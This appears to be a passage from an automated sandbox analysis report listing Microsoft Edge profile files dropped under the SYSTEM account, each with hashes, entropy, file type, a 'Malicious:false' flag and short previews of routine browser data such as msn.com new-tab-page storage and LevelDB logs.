                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.629307656487099E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsFl0lHsl:LsFKk
                                                                                                                                                                  MD5:59E42FA8BDFDF6942E2B8E280194292A
                                                                                                                                                                  SHA1:9E688BD4F00700D43662F8A74B524B66AA77AC71
                                                                                                                                                                  SHA-256:358201C85FD934615EE4EF737861F8A3E08F62274067EE4ECB82931EC504614B
                                                                                                                                                                  SHA-512:D858640EB1BA1B68D26BD26E859AC442552AC1CE53FAA0834CC0FE4BF76D7A61A31C9B0D4B9B28DF2C51B4009AE9C88F165081693C8327A288A43D015D9DD715
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.........................................!3.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 35, cookie 0x1c, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):143360
                                                                                                                                                                  Entropy (8bit):0.4580299380484517
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:dFGnU+bDoYysX0uhny6ztha5+fV0NueLjLqf3u:dFGU+bDo3irhny6vi+fV0F3qf3u
                                                                                                                                                                  MD5:305248216FA88D3E68DD544A3ECEC88E
                                                                                                                                                                  SHA1:A1FAA4309F30BDAFB9899A6C3943AA198EC0814C
                                                                                                                                                                  SHA-256:A52872C476C3D2DA7C2947B0F5947E72976BEB49A4DFE61AF92F263DB4393826
                                                                                                                                                                  SHA-512:7336F0DE1B2B77A3CD1DDD70ED3D860C0CA25D1CDDEF9A221A73862E12FDFFBC2A4353F28088C0079D347315193D5C796E97ED07796FAD761C516B08A9072718
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......#..................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                  Entropy (8bit):0.21845793160718044
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Cl/Uln3lljq7A/mhWJFuQ3yy7IOWUBO/Kl/dweytllrE9SFcTp4AGZs5V9RUIv:Ct2s75fOrO/+/d0Xi99pGsLx
                                                                                                                                                                  MD5:FFF15D6908CA5C75FBA2F0D82757C46E
                                                                                                                                                                  SHA1:C11A04C029DD73387D2C9D46434CB0D8FB7440FD
                                                                                                                                                                  SHA-256:B296357CEA1C25A1331118D92BC5B15DEC33815AE635A0F15291CEABBFC3C742
                                                                                                                                                                  SHA-512:7A7E326732F8FDBCC450E9F4936E48C96E3BA0C9B1C788DBE2375B44A18E2B04C939C104266DE99CCAC77D13AD3857B1D4F2F2C295E20367B679CF56D74DB5CE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$.}m...#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                  Entropy (8bit):5.2126568389590835
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7nMPhYeb8rcHEZrEkVLrj+T+vsPhYeb8rcHEZrELFUv:7nChYeb8nZrEkVLr6QihYeb8nZrEx2
                                                                                                                                                                  MD5:FAFD3499CF6789B575F5693FDB6CC554
                                                                                                                                                                  SHA1:EA69BCF770145AF09181EC05FBD7AF6E65DBF097
                                                                                                                                                                  SHA-256:E604801D2B46DF679B9839B93910997C150251D852506EEBB14A100D99073FFF
                                                                                                                                                                  SHA-512:CFF918404EA719FD628804A8DF125C33876C4227D0C9421C66DDE12B82BA5210BC7ECCF1C6494485A0E5BC8784D09F7D24683643F315323071E10498948A5312
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:28.764 1a1c Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2025/01/11-01:54:28.901 1a1c Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2275
                                                                                                                                                                  Entropy (8bit):5.600793665317641
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:35ZRAAQKBj07X7z8lj1wERS0MXDl1CW9vclYvV6T69X3xelNeWV03Sx4LylsPyA9:JfC811wE80alwukCv2w3EuM2osR
                                                                                                                                                                  MD5:CE370641689DC5536DA9EBC377D74C3C
                                                                                                                                                                  SHA1:18CDE1177CFF12D3D0351471997409F99E7AF618
                                                                                                                                                                  SHA-256:978DD44A769323075BD0845DFAF3576555FB58B05648A8A9A5C35580F271C415
                                                                                                                                                                  SHA-512:4EFF24609F3DAFCF7C201E75420E794E866F61852B96FE12A3243FBD81C90C0A6EE23C021F0D473F898AAD2A466EB6B1FD26C54B08795F4E1F0E391806DD733F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.T..p................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..1adcoords...{"dataType":"Map","value":[["infopane",{"coords":{"x":42,"y":387}}],["nativead-river-1",{"coords":{"x":354,"y":703}}],["nativead-resriver-1",{"coords":{"x":42,"y":1019}}]]}.$_https://ntp.msn.com..1adcoords_date.."2025-01-11T06:54:32.734Z". _https://ntp.msn.com..1adindices...{"dataType":"Map","value":[["infopane",[3,11,15]],["infopanelock",[]],["peekinfopane",[]],["rightrail",[]],["triver",[]],["river",[1]],["riverlock",[]],["peekriver",[]],["infopane-tab",[]],["resinfopane",[6]],["resinfopanelock",[]],["resriver",[1]],["resriverlock",[]],["dense-river",[]],["rivert",[]],["resrivert",[]],["infopane1u",[]]]}.%_https://ntp.msn.com..1adindices_date.."2025-01-11T06:54:32.613Z".&_https://ntp.msn.com..CookieSyncExpiry..1736578472233.._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1131}.!_https://ntp.msn.com..LastKnownPV..1736578471

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):345
                                                                                                                                                                  Entropy (8bit):5.186331260434502
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOn2dvFBJYDhP5c23oH+Tcwt8a2jM8B2KLl1Meq2TYDhP5c23oH+Tcwt8a2jMGIg:7n2HIPhYeb8jFLrVvsPhYeb8EFUv
                                                                                                                                                                  MD5:5A9D215D3814D8841756510C8F999B83
                                                                                                                                                                  SHA1:0063F21BEAF1955A68DE9CE8B13A689D3F15937E
                                                                                                                                                                  SHA-256:6A1936262A587EC2AD8EE56BDCFB3A75C2C0A28ABE40B8520DCA53414390B612
                                                                                                                                                                  SHA-512:0F3289F9C02C4CBE654BB36662F1BE055767CCB1C4B7E2B254BC6BF0E4EE6FB6831242F886AF2D4402B3DCF76AB470B616881400C26414B0926969FFABA72DD4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:25.168 1e80 Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb since it was missing..2025/01/11-01:54:25.566 1e80 Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8236873764424179
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pQ8XNKLyeymwHCn8MouOFlSynlbiXyKwt8hG:pQ8fHG7qXnlbibhG
                                                                                                                                                                  MD5:451AA3F16A70DC92797D12A2F6322613
                                                                                                                                                                  SHA1:9806149DBA5968EC59B1E3EEA29759D71C8B30BA
                                                                                                                                                                  SHA-256:165A6FE46AFEC7D17DCDFAC63F8B148AFA40926E91F8D33D3EA7371CF76FD382
                                                                                                                                                                  SHA-512:3E6DE59F2302F56DE8292F7F209F84D99AF2073589A17213237A77DDFF5E34933700AE5C9B45E31FE76CC27E5C93AD8B8145AB85F9D6C16FF08307A0C2E228E3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 3, database pages 9, cookie 0x5, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):0.4137784766694259
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TL1PD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFS:T1/qALihje9kqL42WOT/9F
                                                                                                                                                                  MD5:5AA0D6A2ECCE658F08BF5E58B9B36AD2
                                                                                                                                                                  SHA1:F1C9C69A80D845597628FFDC3618ED62593CE473
                                                                                                                                                                  SHA-256:9D16F84C9DA5A8CB2E660AE2E225B723EE6137DF147A56791375FC5B22CBABCA
                                                                                                                                                                  SHA-512:B8D37839DB68392E92EA024FA8C54FF3B04D9E7E6DBF28B2AC34420E49614493FE387B0B35F5D3FB65F9D111DF68CCB70C9FC34943D0D07A93F3A70CF1F12C21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`......,......\.t.+.>...,............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                  Entropy (8bit):4.051821770808046
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                  MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                  SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                  SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                  SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"preferred_apps":[],"version":1}

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\QuotaManager

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                  Entropy (8bit):0.4497107890651818
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:TojYdpjKBKBjKOK+jAh+vt4scumU1c00IR5O:0YdlKBKtKOK2ui0u01IR5O
                                                                                                                                                                  MD5:D4D2E3F8991D96F0D96F6A5D0AE24906
                                                                                                                                                                  SHA1:F572CF35A51A7DDF583A0ACE3056AAFC3E8A0FD4
                                                                                                                                                                  SHA-256:E9A45CA5BA45B13079ED9AB20B3FCDAEDC1CE001B161DCA7E682B20AEA1BE94E
                                                                                                                                                                  SHA-512:D5AB5E8C29D68395E3BD681BCE17E90046C1D5495C78F5F33F10F68EBD5A309DE60E8AE378F479032D3F0A6434AA3B3066BF0821100B85FE289A7C045520DE66
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`.........g.......@...Z..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\README

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):182
                                                                                                                                                                  Entropy (8bit):4.2629097520179995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:RGXKRjg0QwVIWRKXECSAV6jDyhjgHGAW+LB2Z4MKLFE1SwhiFAfXQmWyKBPMwRgK:z3frsUpAQQgHGwB26MK8Sw06fXQmWtRT
                                                                                                                                                                  MD5:643E00B0186AA80523F8A6BED550A925
                                                                                                                                                                  SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                                                                                                                  SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                                                                                                                  SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2283
                                                                                                                                                                  Entropy (8bit):5.699576733039609
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:F2xc5NmUcncmoxCRORpllg2hEYfIwCRORpllg2hezHp7CRORpllg2hEDCCRORpli:F2emdWrd6YflrdY7rrd6DGrdpW
                                                                                                                                                                  MD5:A664CA6C2062C3A315E27500FA81B735
                                                                                                                                                                  SHA1:59ED929593D70933E4F0B8B48490EC728C95FBC5
                                                                                                                                                                  SHA-256:E6DD3B851678149CC23B6B99931F2D577D20F6DD00787A1E113AD5251F5FCD7D
                                                                                                                                                                  SHA-512:FD0A1C959E6670085CBAC20DDB588EA48AFB6844AC02F72511C82C2A1CAB7868E8CF34D48C12A83EAE05E4D204113F5E80EEE9F85A3D39586F528FEB4A0722DE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2....N................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h..p.x.................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=t

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):347
                                                                                                                                                                  Entropy (8bit):5.171613999468419
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOnZaQEqJYDhP5c23oH+TcwtE/a252KLl1ZGLq2TYDhP5c23oH+TcwtE/a2ZIFUv:7n8RdPhYeb8xLryvsPhYeb8J2FUv
                                                                                                                                                                  MD5:EE8B5C6661C44750C49F889180B1CE31
                                                                                                                                                                  SHA1:5286FD9D5ADB966F2DE72636AEEDFE31971D0036
                                                                                                                                                                  SHA-256:1FB5CE2F77A3D1C63E742380A0A4F07F00166186EDEA0BE841E1A6BC9526C05B
                                                                                                                                                                  SHA-512:8A420AAEC55B814AC4A5DCC1A8E92695832066173D2C9EBAD9F5B417708874254EBD7A6A83932F90D84ACDBE5B81177E58F888EC375A6F667858A3819CFE41EF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:33.301 a60 Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/11-01:54:33.385 a60 Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):115425
                                                                                                                                                                  Entropy (8bit):5.578265540944137
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNtc1Gv0WQyGNDuw:B9LyxPXfOxr1lMe1nL/5L/TXJ6aWxGww
                                                                                                                                                                  MD5:DDCB859078387830AAFBE43F8FA99112
                                                                                                                                                                  SHA1:1A8B01B4C6B3993BDA5475E41CFF04808AACA6AE
                                                                                                                                                                  SHA-256:141D6F9F3EF8CFFE96EBA5C41103A517F89E07E14852EE7ECDCAA8B2D18BD764
                                                                                                                                                                  SHA-512:7035EFDAAC9A2E5951D9D831984EBD3A8D8E5689DB905DD5F09DD614BCFDB6BBF9DA9ED2685908C8DDC92BCBCE2D69F49ABEB9A78F69257C20FDBF1E8EAC3031
                                                                                                                                                                  Malicious:false
